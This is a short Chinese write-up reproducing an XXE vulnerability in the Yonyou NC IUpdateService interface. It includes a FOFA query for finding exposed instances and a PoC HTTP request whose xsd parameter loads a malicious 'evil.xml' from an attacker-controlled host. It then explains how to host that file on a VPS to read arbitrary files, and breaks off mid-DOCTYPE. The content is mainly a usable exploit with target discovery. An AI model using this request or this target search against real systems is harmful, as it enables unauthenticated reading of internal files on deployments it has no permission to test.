用友 NC IUpdateService XXE漏洞复现

0x01 产品简介

用友 NC 是用友网络科技股份有限公司开发的一款大型企业数字化平台。

0x02 漏洞概述

用友 NC IUpdateService接口存在XML实体注入漏洞，未经身份认证的攻击者可以通过此漏洞获取敏感信息，读取系统内部文件，使系统处于极不安全状态。

0x03 复现环境

FOFA：

app="用友-UFIDA-NC"

0x04 漏洞概述

PoC

GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/evil.xml HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

任意文件读取利用，需要VPS上建立对应操作系统的xml文件，然后开启http服务。xml文件如下 

windows:
<?xml version="1.0"?><!DOCTY